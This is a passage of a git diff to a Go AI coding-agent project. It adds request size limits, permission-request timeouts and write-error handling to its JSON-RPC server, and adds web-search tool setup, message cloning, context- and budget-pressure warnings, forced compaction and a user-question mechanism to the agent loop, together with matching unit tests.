+	"bytes"
 	"context"
 	"encoding/json"
 	"fmt"
@@ -27,6 +28,7 @@ import (
 )
 
 const protocolVersion = 1
+const maxRequestBytes = 10 << 20
 
 type RunOptions struct {
 	Provider   string
@@ -37,6 +39,7 @@ type RunOptions struct {
 	Verbose    bool
 	Debug      bool
 	MultiAgent bool
+	WebSearch  bool
 }
 
 type server struct {
@@ -69,6 +72,8 @@ type server struct {
 	nextID int64
 	r      *bufio.Reader
 	w      io.Writer
+
+	permissionTimeout time.Duration
 }
 
 type sessionRuntime struct {
@@ -226,6 +231,9 @@ func Run(opts RunOptions) error {
 	if err != nil {
 		return fmt.Errorf("load settings: %w", err)
 	}
+	if opts.WebSearch {
+		settings.WebSearch.Enabled = config.BoolPtr(true)
+	}
 
 	cwd, err := os.Getwd()
 	if err != nil {
@@ -319,10 +327,12 @@ func Run(opts RunOptions) error {
 			if err == io.EOF {
 				return nil
 			}
-			srv.writeMessage(map[string]any{
+			if err := srv.writeMessage(map[string]any{
 				"jsonrpc": "2.0",
 				"error":   &mcp.RPCError{Code: -32700, Message: err.Error()},
-			})
+			}); err != nil {
+				return err
+			}
 			continue
 		}
 
@@ -537,7 +547,12 @@ func (s *server) handlePrompt(req rpcRequest) {
 	}
 	rt.agent = a
 	go func() {
+		stopReason := "end_turn"
+		var runErr error
 		defer func() {
+			if s.agentMgr != nil && rt.agent != nil {
+				s.agentMgr.Finish(rt.agent.ID(), runErr)
+			}
 			rt.cancelMu.Lock()
 			if rt.promptID == promptKey {
 				rt.cancel = nil
@@ -546,8 +561,6 @@ func (s *server) handlePrompt(req rpcRequest) {
 			rt.cancelMu.Unlock()
 			cancel()
 		}()
-		stopReason := "end_turn"
-		var runErr error
 		events := rt.agent.Run(ctx, userText)
 		for ev := range events {
 			s.handleAgentEvent(rt.id, ev)
@@ -766,6 +779,8 @@ func (s *server) handleMCPSamplingCreateMessage(ctx context.Context, sessionID,
 		SystemPrompt:  systemPrompt,
 		ThinkingLevel: s.thinkingLevel,
 		MaxTokens:     maxTokens,
+		Temperature:   s.m.Temperature,
+		TopP:          s.m.TopP,
 		ModelID:       modelID,
 	})
 	var outText strings.Builder
@@ -886,7 +901,7 @@ func (s *server) requestPermission(sessionID, toolCallID, toolName string, args
 	s.mu.Lock()
 	s.pending[id] = ch
 	s.mu.Unlock()
-	s.notifyRequest(id, "session/request_permission", requestPermissionRequest{
+	if err := s.notifyRequest(id, "session/request_permission", requestPermissionRequest{
 		SessionID: sessionID,
 		ToolCall: permissionToolCall{
 			ToolCallID: toolCallID,
@@ -899,9 +914,17 @@ func (s *server) requestPermission(sessionID, toolCallID, toolName string, args
 			{OptionID: "allow-once", Name: "Allow once", Kind: "allow_once"},
 			{OptionID: "reject-once", Name: "Reject", Kind: "reject_once"},
 		},
-	})
+	}); err != nil {
+		s.deletePending(id)
+		return false
+	}
+	timeout := s.permissionTimeout
+	if timeout <= 0 {
+		timeout = 30 * time.Second
+	}
 	select {
-	case <-time.After(30 * time.Second):
+	case <-time.After(timeout):
+		s.deletePending(id)
 		return false
 	case resp := <-ch:
 		var out permissionResult
@@ -910,6 +933,12 @@ func (s *server) requestPermission(sessionID, toolCallID, toolName string, args
 	}
 }
 
+func (s *server) deletePending(id string) {
+	s.mu.Lock()
+	delete(s.pending, id)
+	s.mu.Unlock()
+}
+
 func (s *server) deliverResponse(id json.RawMessage, result json.RawMessage, errMsg json.RawMessage) {
 	key := strings.Trim(string(id), "\"")
 	s.mu.Lock()
@@ -1073,11 +1102,24 @@ func (s *server) nextRequestID() string {
 
 func (s *server) readRequest() (rpcRequest, error) {
 	var req rpcRequest
-	line, err := s.r.ReadBytes('\n')
-	if err != nil {
-		return req, err
+	var buf bytes.Buffer
+	for {
+		part, err := s.r.ReadSlice('\n')
+		if len(part) > 0 {
+			if buf.Len()+len(part) > maxRequestBytes {
+				return req, fmt.Errorf("message exceeds maximum size of %d bytes", maxRequestBytes)
+			}
+			buf.Write(part)
+		}
+		if err == bufio.ErrBufferFull {
+			continue
+		}
+		if err != nil {
+			return req, err
+		}
+		break
 	}
-	payload := strings.TrimRight(string(line), "\r\n")
+	payload := strings.TrimRight(buf.String(), "\r\n")
 	if strings.TrimSpace(payload) == "" {
 		return req, fmt.Errorf("empty message")
 	}
@@ -1087,7 +1129,7 @@ func (s *server) readRequest() (rpcRequest, error) {
 	return req, nil
 }
 
-func (s *server) writeResponse(id json.RawMessage, result any, errResp *mcp.RPCError) {
+func (s *server) writeResponse(id json.RawMessage, result any, errResp *mcp.RPCError) error {
 	resp := map[string]any{
 		"jsonrpc": "2.0",
 		"id":      id,
@@ -1097,11 +1139,11 @@ func (s *server) writeResponse(id json.RawMessage, result any, errResp *mcp.RPCE
 	} else {
 		resp["result"] = result
 	}
-	s.writeMessage(resp)
+	return s.writeMessage(resp)
 }
 
-func (s *server) notify(sessionID string, update sessionUpdate) {
-	s.writeMessage(map[string]any{
+func (s *server) notify(sessionID string, update sessionUpdate) error {
+	return s.writeMessage(map[string]any{
 		"jsonrpc": "2.0",
 		"method":  "session/update",
 		"params": map[string]any{
@@ -1111,8 +1153,8 @@ func (s *server) notify(sessionID string, update sessionUpdate) {
 	})
 }
 
-func (s *server) notifyRequest(id string, method string, params any) {
-	s.writeMessage(map[string]any{
+func (s *server) notifyRequest(id string, method string, params any) error {
+	return s.writeMessage(map[string]any{
 		"jsonrpc": "2.0",
 		"id":      id,
 		"method":  method,
@@ -1120,13 +1162,23 @@ func (s *server) notifyRequest(id string, method string, params any) {
 	})
 }
 
-func (s *server) writeMessage(v any) {
-	data, _ := json.Marshal(v)
+func (s *server) writeMessage(v any) error {
+	data, err := json.Marshal(v)
+	if err != nil {
+		return err
+	}
 	s.wmu.Lock()
 	defer s.wmu.Unlock()
-	_, _ = s.w.Write(data)
-	_, _ = s.w.Write([]byte("\n"))
+	if _, err := s.w.Write(data); err != nil {
+		return err
+	}
+	if _, err := s.w.Write([]byte("\n")); err != nil {
+		return err
+	}
 	if f, ok := s.w.(interface{ Flush() error }); ok {
-		_ = f.Flush()
+		if err := f.Flush(); err != nil {
+			return err
+		}
 	}
+	return nil
 }
diff --git a/internal/acp/acp_mcp_test.go b/internal/acp/acp_mcp_test.go
index d7bf5d5..53f3d4c 100644
--- a/internal/acp/acp_mcp_test.go
+++ b/internal/acp/acp_mcp_test.go
@@ -1,38 +1,75 @@
 package acp
 
 import (
+	"bufio"
+	"bytes"
 	"encoding/json"
+	"errors"
+	"strings"
 	"testing"
+	"time"
 )
 
 func TestExtractSamplingInput(t *testing.T) {
-	raw := json.RawMessage(`{
-		"maxTokens": 512,
-		"messages": [
-			{"role":"system","content":"you are concise"},
-			{"role":"user","content":"hello"},
-			{"role":"user","content":[{"type":"text","text":"world"}]}
-		]
-	}`)
+	raw := json.RawMessage(`{"maxTokens":512,"messages":[{"role":"system","content":"sys"},{"role":"user","content":"hello"}]}`)
 	prompt, systemPrompt, maxTokens := extractSamplingInput(raw)
-	if prompt != "hello\nworld" {
-		t.Fatalf("unexpected prompt: %q", prompt)
+	if prompt != "hello" {
+		t.Errorf("prompt: got %q", prompt)
 	}
-	if systemPrompt != "you are concise" {
-		t.Fatalf("unexpected system prompt: %q", systemPrompt)
+	if systemPrompt != "sys" {
+		t.Errorf("systemPrompt: got %q", systemPrompt)
 	}
 	if maxTokens != 512 {
-		t.Fatalf("unexpected maxTokens: %d", maxTokens)
+		t.Errorf("maxTokens: got %d", maxTokens)
 	}
 }
 
 func TestParseJSONRawToMap(t *testing.T) {
-	raw := json.RawMessage(`{"a":1}`)
+	raw := json.RawMessage("{}")
 	m := parseJSONRawToMap(raw)
 	if m == nil {
-		t.Fatal("expected map, got nil")
+		t.Fatal("expected map")
 	}
-	if _, ok := m["a"]; !ok {
-		t.Fatalf("missing key a: %#v", m)
+	m = parseJSONRawToMap(json.RawMessage("bad"))
+	if m != nil {
+		t.Error("expected nil")
 	}
 }
+
+func TestRequestPermissionTimeoutCleansPending(t *testing.T) {
+	s := &server{
+		pending:           make(map[string]chan json.RawMessage),
+		w:                 &bytes.Buffer{},
+		permissionTimeout: time.Millisecond,
+	}
+
+	if s.requestPermission("session-1", "tool-1", "bash", map[string]any{"command": "date"}) {
+		t.Fatal("requestPermission returned true, want false on timeout")
+	}
+
+	if len(s.pending) != 0 {
+		t.Fatalf("pending len = %d, want 0", len(s.pending))
+	}
+}
+
+func TestWriteMessageReturnsWriteError(t *testing.T) {
+	s := &server{w: errWriter{}}
+
+	if err := s.writeMessage(map[string]any{"jsonrpc": "2.0"}); err == nil {
+		t.Fatal("writeMessage error = nil, want error")
+	}
+}
+
+func TestReadRequestRejectsOversizedMessage(t *testing.T) {
+	s := &server{r: bufio.NewReader(strings.NewReader(strings.Repeat("x", maxRequestBytes+1) + "\n"))}
+
+	if _, err := s.readRequest(); err == nil {
+		t.Fatal("readRequest error = nil, want oversized error")
+	}
+}
+
+type errWriter struct{}
+
+func (errWriter) Write([]byte) (int, error) {
+	return 0, errors.New("write failed")
+}
diff --git a/internal/agent/agent.go b/internal/agent/agent.go
index 76f8b28..f295a76 100644
--- a/internal/agent/agent.go
+++ b/internal/agent/agent.go
@@ -6,6 +6,7 @@ import (
 	"fmt"
 	"strings"
 	"sync"
+	"sync/atomic"
 	"time"
 
 	agentpkg "github.com/startvibecoding/vibecoding/agent"
@@ -25,6 +26,8 @@ const (
 	agentIDKey contextKey = iota
 	// agentEventChanKey is the context key for the current agent's event channel.
 	agentEventChanKey
+	// parentRunContextKey carries the parent agent run context through tool timeouts.
+	parentRunContextKey
 )
 
 // ContextWithAgentID returns a new context with the agent ID attached.
@@ -49,6 +52,17 @@ func EventChanFromContext(ctx context.Context) (chan<- Event, bool) {
 	return ch, ok
 }
 
+// ContextWithParentRunContext attaches the parent agent run context to a tool context.
+func ContextWithParentRunContext(ctx context.Context, parent context.Context) context.Context {
+	return context.WithValue(ctx, parentRunContextKey, parent)
+}
+
+// ParentRunContextFromContext extracts the parent agent run context.
+func ParentRunContextFromContext(ctx context.Context) (context.Context, bool) {
+	parent, ok := ctx.Value(parentRunContextKey).(context.Context)
+	return parent, ok
+}
+
 // Config holds the agent configuration.
 type Config struct {
 	ID                 agentpkg.AgentID
@@ -96,6 +110,18 @@ type AgentLoopConfig struct {
 
 	// AfterToolCall is called after a tool finishes executing.
 	AfterToolCall func(ctx AfterToolCallContext) *ToolCallResult
+
+	// ContextPressureThreshold is the context usage percentage (0-1) that triggers EventContextPressure.
+	// 0 means disabled. Default: 0.55 (55%).
+	ContextPressureThreshold float64
+
+	// BudgetPressureThreshold is the remaining iteration ratio (0-1) that triggers EventBudgetPressure.
+	// 0 means disabled. Default: 0.20 (remaining 20%).
+	BudgetPressureThreshold float64
+
+	// MaxConsecutiveNoText is the max tool-only turns before a stuck-detection warning.
+	// 0 means default (95).
+	MaxConsecutiveNoText int
 }
 
 // ShouldStopAfterTurnContext is passed to ShouldStopAfterTurn.
@@ -156,6 +182,61 @@ type AgentContext struct {
 	Tools        []provider.ToolDefinition
 }
 
+func cloneAgentContext(ctx *AgentContext) *AgentContext {
+	if ctx == nil {
+		return nil
+	}
+	return &AgentContext{
+		SystemPrompt: ctx.SystemPrompt,
+		Messages:     cloneMessages(ctx.Messages),
+		Tools:        append([]provider.ToolDefinition(nil), ctx.Tools...),
+	}
+}
+
+func cloneMessages(messages []provider.Message) []provider.Message {
+	if len(messages) == 0 {
+		return nil
+	}
+	cloned := make([]provider.Message, len(messages))
+	for i, msg := range messages {
+		cloned[i] = cloneMessage(msg)
+	}
+	return cloned
+}
+
+func cloneMessage(msg provider.Message) provider.Message {
+	cloned := msg
+	if len(msg.Contents) > 0 {
+		cloned.Contents = make([]provider.ContentBlock, len(msg.Contents))
+		for i, block := range msg.Contents {
+			cloned.Contents[i] = cloneContentBlock(block)
+		}
+	}
+	if msg.Usage != nil {
+		usage := *msg.Usage
+		cloned.Usage = &usage
+	}
+	return cloned
+}
+
+func cloneContentBlock(block provider.ContentBlock) provider.ContentBlock {
+	cloned := block
+	if block.Image != nil {
+		image := *block.Image
+		cloned.Image = &image
+	}
+	if block.ToolCall != nil {
+		toolCall := *block.ToolCall
+		toolCall.Arguments = append([]byte(nil), block.ToolCall.Arguments...)
+		cloned.ToolCall = &toolCall
+	}
+	if block.CacheControl != nil {
+		cacheControl := *block.CacheControl
+		cloned.CacheControl = &cacheControl
+	}
+	return cloned
+}
+
 // Agent is the core agent loop.
 type Agent struct {
 	id          agentpkg.AgentID
@@ -179,14 +260,31 @@ type Agent struct {
 	pendingApprovals map[string]chan bool // approvalID -> response channel
 	approvalMu       sync.Mutex
 	approvalCounter  int64
+
+	// Question mechanism for plan mode
+	pendingQuestions map[string]chan string // questionID -> response channel
+	questionMu       sync.Mutex
+	questionCounter  int64
+
+	// Force compaction flag — set by /compact command, consumed by ShouldCompact
+	forceCompact int32 // atomic: 0=false, 1=true
 }
 
 // buildFrozenPrompt builds the system prompt and tools once at construction time.
 // These values are frozen for the entire session lifetime to maximize prompt cache hits.
 // This implements Rule R2.1 from LLM_Agent_Cache.md: System prompt must be built once and never modified.
 func (a *Agent) buildFrozenPrompt() {
-	toolNames := make([]string, 0)
-	for _, t := range a.registry.ModeTools(a.config.Mode) {
+	toolDefs := a.registry.ModeTools(a.config.Mode)
+	if a.config.Settings != nil {
+		if t, ok := webSearchToolDefinition(a.config.Settings); ok {
+			toolDefs = append(toolDefs, t)
+		}
+	}
+	toolNames := make([]string, 0, len(toolDefs))
+	for _, t := range toolDefs {
+		if t.Kind == "hosted" {
+			continue
+		}
 		toolNames = append(toolNames, t.Name)
 	}
 	toolSnippets := a.registry.ToolSnippets(toolNames)
@@ -200,10 +298,90 @@ func (a *Agent) buildFrozenPrompt() {
 		toolGuidelines,
 		a.config.MultiAgent,
 	)
-	a.frozenToolDefs = a.registry.ModeTools(a.config.Mode)
+	a.frozenToolDefs = toolDefs
 	a.frozenToolNames = toolNames
 }
 
+func webSearchToolDefinition(settings *config.Settings) (provider.ToolDefinition, bool) {
+	if settings == nil || !settings.IsWebSearchEnabled() {
+		return provider.ToolDefinition{}, false
+	}
+	cfg := settings.WebSearch
+	providerName := cfg.Provider
+	if providerName == "" {
+		providerName = settings.DefaultProvider
+	}
+	if providerName == "" {
+		providerName = "openai"
+	}
+
+	resolved := provider.AdapterConfig{}
+	if pc := settings.GetProviderConfig(providerName); pc != nil {
+		resolved = provider.ResolveAdapterConfig(pc)
+	} else {
+		resolved = provider.ResolveAdapterConfig(&config.ProviderConfig{API: "openai-chat"})
+		switch providerName {
+		case "anthropic":
+			resolved.API = "anthropic-messages"
+		case "openai":
+			resolved.API = "openai-responses"
+		}
+	}
+
+	providerType := cfg.ProviderType
+	if providerType == "" {
+		switch resolved.API {
+		case "anthropic-messages":
+			providerType = "messages"
+		default:
+			providerType = "responses"
+		}
+	}
+
+	return provider.ToolDefinition{
+		Name:         "web_search",
+		Kind:         "hosted",
+		Provider:     providerName,
+		ProviderType: providerType,
+		Model:        cfg.Model,
+	}, true
+}
+
+// supportsImages checks if the model supports image input.
+func (a *Agent) supportsImages() bool {
+	if a.config.Model == nil {
+		return false
+	}
+	for _, input := range a.config.Model.Input {
+		if input == "image" {
+			return true
+		}
+	}
+	return false
+}
+
+// stripImageContent removes image content blocks from messages.
+// This prevents 404 errors when sending to models that don't support image input.
+func stripImageContent(messages []provider.Message) []provider.Message {
+	result := make([]provider.Message, 0, len(messages))
+	for _, msg := range messages {
+		if len(msg.Contents) > 0 {
+			var filtered []provider.ContentBlock
+			for _, c := range msg.Contents {
+				if c.Type != "image" {
+					filtered = append(filtered, c)
+				}
+			}
+			if len(filtered) == 0 && msg.Content == "" {
+				continue // skip message with only image content and no text
+			}
+			msg.Contents = filtered
+		}
+		result = append(result, msg)
+	}
+	return result
+}
+
 // buildSessionContextMessage builds the [session context] message with dynamic information.
 // This implements Rule R2.3 from LLM_Agent_Cache.md: dynamic info goes into a separate message.
 // The message is marked as SystemInjected so cache markers skip it.
@@ -333,6 +511,7 @@ func New(cfg Config, registry *tools.Registry) *Agent {
 		registry:         registry,
 		abort:            make(chan struct{}),
 		pendingApprovals: make(map[string]chan bool),
+		pendingQuestions:  make(map[string]chan string),
 		context: &AgentContext{
 			Messages: make([]provider.Message, 0),
 		},
@@ -365,6 +544,7 @@ func NewWithLoopConfig(cfg AgentLoopConfig, registry *tools.Registry) *Agent {
 		registry:         registry,
 		abort:            make(chan struct{}),
 		pendingApprovals: make(map[string]chan bool),
+		pendingQuestions:  make(map[string]chan string),
 		context: &AgentContext{
 			Messages: make([]provider.Message, 0),
 		},
@@ -392,6 +572,12 @@ func (a *Agent) Abort() {
 	})
 }
 
+func (a *Agent) callbackSnapshot() ([]provider.Message, *AgentContext) {
+	a.mu.RLock()
+	defer a.mu.RUnlock()
+	return cloneMessages(a.messages), cloneAgentContext(a.context)
+}
+
 // emit sends an event with this agent's ID stamped on it.
 func (a *Agent) emit(ch chan<- Event, event Event) {
 	event.AgentID = a.id
@@ -457,10 +643,17 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 
 	// Track consecutive iterations without text output for loop detection
 	consecutiveNoText := 0
-	const maxConsecutiveNoText = 95            // Threshold to trigger stuck detection
+	maxConsecutiveNoText := a.config.MaxConsecutiveNoText
+	if maxConsecutiveNoText <= 0 {
+		maxConsecutiveNoText = 95 // default threshold
+	}
 	const maxConsecutiveNoTextAfterWarning = 5 // After warning, allow 5 more turns before stopping
 	warningIssued := false
 
+	// Pressure tracking — fire events once per threshold crossing
+	contextPressureFired := false
+	budgetPressureFired := false
+
 	for i := 0; i < a.config.MaxIterations; i++ {
 		select {
 		case <-ctx.Done():
@@ -481,11 +674,15 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 		// Process pending steering messages
 		if a.config.GetSteeringMessages != nil {
 			steeringMessages := a.config.GetSteeringMessages()
-			for _, msg := range steeringMessages {
-				ch <- Event{Type: EventMessageStart, Message: msg}
-				ch <- Event{Type: EventMessageEnd, Message: msg}
-				a.messages = append(a.messages, msg)
-				a.context.Messages = append(a.context.Messages, msg)
+			if len(steeringMessages) > 0 {
+				a.mu.Lock()
+				for _, msg := range steeringMessages {
+					ch <- Event{Type: EventMessageStart, Message: msg}
+					ch <- Event{Type: EventMessageEnd, Message: msg}
+					a.messages = append(a.messages, msg)
+					a.context.Messages = append(a.context.Messages, msg)
+				}
+				a.mu.Unlock()
 			}
 		}
 
@@ -504,6 +701,11 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 		allMessages = append(allMessages, a.messages...)
 		a.mu.RUnlock()
 
+		// Strip image content if model doesn't support it
+		if !a.supportsImages() {
+			allMessages = stripImageContent(allMessages)
+		}
+
 		// Select cache markers (dual-marker rolling buffer, R3.1-R3.3)
 		markers := selectCacheMarkers(allMessages)
 		messagesWithMarkers := applyCacheMarkers(allMessages, markers)
@@ -515,6 +717,8 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 			SystemPrompt:  a.frozenSystemPrompt,
 			ThinkingLevel: a.config.ThinkingLevel,
 			MaxTokens:     a.config.MaxTokens,
+			Temperature:   a.config.Model.Temperature,
+			TopP:          a.config.Model.TopP,
 			Abort:         a.abort,
 		}
 
@@ -705,7 +909,7 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 				} else {
 					// Already warned, now truly stuck. Tool results have already been
 					// appended, so the saved transcript remains provider-valid.
-					ch <- Event{Type: EventError, Error: fmt.Errorf("agent appears stuck: %d consecutive turns without text output after warning", consecutiveNoText+maxConsecutiveNoText), StopReason: "stuck"}
+					ch <- Event{Type: EventError, Error: fmt.Errorf("agent appears stuck: %d consecutive turns without text output after warning", consecutiveNoText), StopReason: "stuck"}
 					ch <- Event{Type: EventAgentEnd, Messages: func() []provider.Message {
 						a.mu.RLock()
 						defer a.mu.RUnlock()
@@ -720,6 +924,55 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 
 		ch <- Event{Type: EventTurnEnd, TurnMessage: assistantMsg, TurnToolResults: toolResults, ContextUsage: a.GetContextUsage()}
 
+		// --- Pressure checks (fire once per threshold crossing) ---
+
+		// Context Pressure: fire EventContextPressure once when usage exceeds threshold
+		if !contextPressureFired {
+			threshold := a.config.ContextPressureThreshold
+			if threshold <= 0 {
+				threshold = 0.55 // default 55%
+			}
+			if ctx := a.GetContextUsage(); ctx != nil && ctx.Percent != nil {
+				if *ctx.Percent >= threshold {
+					contextPressureFired = true
+					warnMsg := fmt.Sprintf(
+						"[Context Pressure] %.0f%% of context window used (%d/%d tokens). "+
+							"Compaction will trigger soon. Consider saving important context to memory.md and wrapping up the current task.",
+						*ctx.Percent, ctx.Tokens, ctx.ContextWindow)
+					ch <- Event{
+						Type:            EventContextPressure,
+						PressureMessage: warnMsg,
+						PressureType:    "context",
+						PressurePercent: *ctx.Percent,
+						ContextUsage:    ctx,
+					}
+				}
+			}
+		}
+
+		// Budget Pressure: fire EventBudgetPressure once when remaining iterations reach threshold
+		if !budgetPressureFired {
+			threshold := a.config.BudgetPressureThreshold
+			if threshold <= 0 {
+				threshold = 0.20 // default 20%
+			}
+			remaining := float64(a.config.MaxIterations-i) / float64(a.config.MaxIterations)
+			if remaining <= threshold {
+				budgetPressureFired = true
+				remainingTurns := a.config.MaxIterations - i
+				warnMsg := fmt.Sprintf(
+					"[Budget Pressure] %d/%d turns remaining (%.0f%%). "+
+						"Complete the current task and summarize progress.",
+					remainingTurns, a.config.MaxIterations, remaining*100)
+				ch <- Event{
+					Type:            EventBudgetPressure,
+					PressureMessage: warnMsg,
+					PressureType:    "budget",
+					PressurePercent: remaining * 100,
+				}
+			}
+		}
+
 		// Check if compaction should trigger
 		if a.ShouldCompact() {
 			if err := a.Compact(ctx, ch); err != nil {
@@ -730,11 +983,12 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 
 		// Check if we should stop after this turn
 		if a.config.ShouldStopAfterTurn != nil {
+			messagesSnapshot, contextSnapshot := a.callbackSnapshot()
 			stopCtx := ShouldStopAfterTurnContext{
 				Message:     assistantMsg,
-				ToolResults: toolResults,
-				Context:     a.context,
-				NewMessages: a.messages,
+				ToolResults: cloneMessages(toolResults),
+				Context:     contextSnapshot,
+				NewMessages: messagesSnapshot,
 			}
 			if a.config.ShouldStopAfterTurn(stopCtx) {
 				ch <- Event{Type: EventDone, StopReason: "should_stop"}
@@ -751,12 +1005,13 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 
 		// Prepare next turn
 		if a.config.PrepareNextTurn != nil {
+			messagesSnapshot, contextSnapshot := a.callbackSnapshot()
 			prepCtx := PrepareNextTurnContext{
 				ShouldStopAfterTurnContext: ShouldStopAfterTurnContext{
 					Message:     assistantMsg,
-					ToolResults: toolResults,
-					Context:     a.context,
-					NewMessages: a.messages,
+					ToolResults: cloneMessages(toolResults),
+					Context:     contextSnapshot,
+					NewMessages: messagesSnapshot,
 				},
 			}
 			update := a.config.PrepareNextTurn(prepCtx)
@@ -940,6 +1195,8 @@ func (a *Agent) executeSingleToolCall(ctx context.Context, tc provider.ToolCallB
 	// Inject agent ID and event channel into context for sub-agent tools
 	toolCtx = ContextWithAgentID(toolCtx, a.id)
 	toolCtx = ContextWithEventChan(toolCtx, ch)
+	toolCtx = ContextWithParentRunContext(toolCtx, ctx)
+	toolCtx = tools.ContextWithQuestionAsker(toolCtx, a)
 
 	result, err := tool.Execute(toolCtx, params)
 	isError := err != nil
@@ -1066,8 +1323,27 @@ func (a *Agent) GetContextUsage() *ctxpkg.ContextUsage {
 	}
 }
 
+// SetForceCompact marks the agent for forced compaction on the next turn.
+// Called by /compact command in TUI and Gateway.
+func (a *Agent) SetForceCompact() {
+	atomic.StoreInt32(&a.forceCompact, 1)
+}
+
 // ShouldCompact checks if compaction should trigger.
+// Returns true if context exceeds the threshold OR if forced via SetForceCompact.
 func (a *Agent) ShouldCompact() bool {
+	// Check force flag first (consumes it)
+	if atomic.CompareAndSwapInt32(&a.forceCompact, 1, 0) {
+		// Force compaction requested — still need a model and some messages
+		a.mu.RLock()
+		hasModel := a.config.Model != nil
+		hasMsgs := len(a.messages) >= 2
+		a.mu.RUnlock()
+		if hasModel && hasMsgs {
+			return true
+		}
+	}
+
 	a.mu.RLock()
 	defer a.mu.RUnlock()
 	if !a.config.CompactionSettings.Enabled {
@@ -1246,3 +1522,52 @@ func (a *Agent) HandleApprovalResponse(approvalID string, approved bool) {
 		delete(a.pendingApprovals, approvalID)
 	}
 }
+
+// RequestQuestion sends a question request and waits for the user's answer.
+func (a *Agent) RequestQuestion(ch chan<- Event, question string, options []string, context string) string {
+	a.questionMu.Lock()
+	a.questionCounter++
+	questionID := fmt.Sprintf("question-%d", a.questionCounter)
+	responseCh := make(chan string, 1)
+	a.pendingQuestions[questionID] = responseCh
+	a.questionMu.Unlock()
+
+	ch <- Event{
+		Type:            EventQuestionRequest,
+		QuestionID:      questionID,
+		QuestionText:    question,
+		QuestionOptions: options,
+		QuestionContext: context,
+	}
+
+	select {
+	case answer := <-responseCh:
+		return answer
+	case <-a.abort:
+		a.questionMu.Lock()
+		delete(a.pendingQuestions, questionID)
+		a.questionMu.Unlock()
+		return ""
+	}
+}
+
+// HandleQuestionResponse processes the user's answer to a question.
+func (a *Agent) HandleQuestionResponse(questionID string, answer string) {
+	a.questionMu.Lock()
+	defer a.questionMu.Unlock()
+
+	if ch, ok := a.pendingQuestions[questionID]; ok {
+		ch <- answer
+		delete(a.pendingQuestions, questionID)
+	}
+}
+
+// AskQuestion implements the tools.QuestionAsker interface.
+// It gets the event channel from the context and delegates to RequestQuestion.
+func (a *Agent) AskQuestion(ctx context.Context, question string, options []string, explanation string) string {
+	eventCh, ok := EventChanFromContext(ctx)
+	if !ok {
+		return ""
+	}
+	return a.RequestQuestion(eventCh, question, options, explanation)
+}
diff --git a/internal/agent/agent_test.go b/internal/agent/agent_test.go
index 37f19b5..632cee4 100644
--- a/internal/agent/agent_test.go
+++ b/internal/agent/agent_test.go
@@ -2,10 +2,12 @@ package agent
 
 import (
 	"context"
+	"encoding/json"
 	"fmt"
 	"testing"
 	"time"
 
+	"github.com/startvibecoding/vibecoding/internal/config"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
 	"github.com/startvibecoding/vibecoding/internal/tools"
@@ -404,6 +406,38 @@ func TestToolOnlyWarningAppendedAfterToolResults(t *testing.T) {
 	}
 }
 
+func TestCallbackSnapshotDoesNotExposeInternalSlices(t *testing.T) {
+	mockProvider := newMockProvider()
+	a := New(Config{
+		Provider: mockProvider,
+		Model:    mockProvider.Models()[0],
+		Mode:     "agent",
+	}, tools.NewRegistry(t.TempDir(), sandbox.NewNoneSandbox()))
+
+	a.messages = []provider.Message{
+		provider.NewAssistantMessage([]provider.ContentBlock{{
+			Type: "toolCall",
+			ToolCall: &provider.ToolCallBlock{
+				ID:        "call-1",
+				Name:      "read",
+				Arguments: json.RawMessage(`{"path":"a"}`),
+			},
+		}}),
+	}
+	a.context.Messages = a.messages
+
+	messages, ctx := a.callbackSnapshot()
+	messages[0].Contents[0].ToolCall.Name = "mutated"
+	ctx.Messages[0].Contents[0].ToolCall.Arguments[0] = '{'
+
+	if a.messages[0].Contents[0].ToolCall.Name != "read" {
+		t.Fatalf("internal tool name mutated: %s", a.messages[0].Contents[0].ToolCall.Name)
+	}
+	if string(a.context.Messages[0].Contents[0].ToolCall.Arguments) != `{"path":"a"}` {
+		t.Fatalf("internal arguments mutated: %s", string(a.context.Messages[0].Contents[0].ToolCall.Arguments))
+	}
+}
+
 func TestAgentRunSequential(t *testing.T) {
 	toolCall1 := &provider.ToolCallBlock{
 		ID:        "call_1",
@@ -468,6 +502,63 @@ func TestAgentRunSequential(t *testing.T) {
 	}
 }
 
+func TestWebSearchToolDefinitionCarriesModelMetadata(t *testing.T) {
+	settings := &config.Settings{
+		WebSearch: config.WebSearchSettings{
+			Enabled:      config.BoolPtr(true),
+			Provider:     "anthropic",
+			ProviderType: "messages",
+			Model:        "claude-sonnet-4-20250514",
+		},
+	}
+	def, ok := webSearchToolDefinition(settings)
+	if !ok {
+		t.Fatal("expected web search tool definition")
+	}
+	if def.Name != "web_search" {
+		t.Fatalf("name = %q, want web_search", def.Name)
+	}
+	if def.Provider != "anthropic" {
+		t.Fatalf("provider = %q, want anthropic", def.Provider)
+	}
+	if def.ProviderType != "messages" {
+		t.Fatalf("providerType = %q, want messages", def.ProviderType)
+	}
+	if def.Model != "claude-sonnet-4-20250514" {
+		t.Fatalf("model = %q, want claude-sonnet-4-20250514", def.Model)
+	}
+}
+
+func TestWebSearchToolDefinitionResolvesProviderReference(t *testing.T) {
+	settings := &config.Settings{
+		DefaultProvider: "gpt",
+		WebSearch: config.WebSearchSettings{
+			Enabled:      config.BoolPtr(true),
+			Provider:     "gpt",
+			ProviderType: "responses",
+		},
+		Providers: map[string]*config.ProviderConfig{
+			"gpt": {
+				BaseURL: "https://co.yes.vg/v1",
+				API:     "openai-responses",
+			},
+		},
+	}
+	def, ok := webSearchToolDefinition(settings)
+	if !ok {
+		t.Fatal("expected web search tool definition")
+	}
+	if def.Provider != "gpt" {
+		t.Fatalf("provider = %q, want gpt", def.Provider)
+	}
+	if def.ProviderType != "responses" {
+		t.Fatalf("providerType = %q, want responses", def.ProviderType)
+	}
+	if def.Provider == "" {
+		t.Fatal("expected hosted provider to be resolved")
+	}
+}
+
 func TestBuildSystemPrompt(t *testing.T) {
 	toolNames := []string{"read", "write", "bash"}
 	cwd := "/home/user/project"
@@ -548,6 +639,67 @@ func TestBuildSystemPromptMultiAgentGated(t *testing.T) {
 	}
 }
 
